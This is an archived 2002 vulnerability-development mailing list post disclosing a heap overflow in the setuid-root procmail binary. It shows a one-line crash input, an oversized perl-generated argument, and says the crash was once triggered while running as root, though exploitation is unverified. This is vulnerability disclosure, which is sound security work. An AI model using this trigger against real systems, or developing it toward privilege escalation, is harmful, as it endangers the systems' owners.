Vulnerability Development mailing list archives
procmail heap overflow
From: flatline <flatline () blackhat nl>
Date: Wed, 19 Jun 2002 02:38:08 +0200
hi,
i found a heap overflow in procmail (up until latest) some time ago.
flatline@intra:/usr/bin$ ls -la procmail
-rwsr-xr-x 1 root mail 64344 Jun 3 2001 procmail*
flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A
procmail: Exceeded LINEBUF
Segmentation fault
flatline@intra:/usr/bin$
at first it seemed to properly drop privs before segging, but not too long
ago i managed to make it crash while it still had euid 0.
segfaults have been seen on red hat/slackware linux and bsd variants.
successful exploitation has not been verified.
/ flatlinegreets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone who felt left out.
Current thread:
- procmail heap overflow flatline (Jun 19)
- Re: procmail heap overflow Ryan W. Maple (Jun 19)
- Re: procmail heap overflow Przemyslaw Frasunek (Jun 19)
- RE: procmail heap overflow Christopher Meiklejohn (Jun 19)
- Re: procmail heap overflow kam (Jun 19)
- Re: procmail heap overflow SpaceWalker (Jun 19)
- Re: procmail heap overflow KF (Jun 19)
- <Possible follow-ups>
- RE: procmail heap overflow Peter Mueller (Jun 19)
- Re: procmail heap overflow Artur Byszko / bikero (Jun 20)
- Re: procmail heap overflow Przemyslaw Frasunek (Jun 21)
- Re: procmail heap overflow Artur Byszko / bikero (Jun 20)
- RE: procmail heap overflow Wodahs Latigid (Jun 20)
(Thread continues...)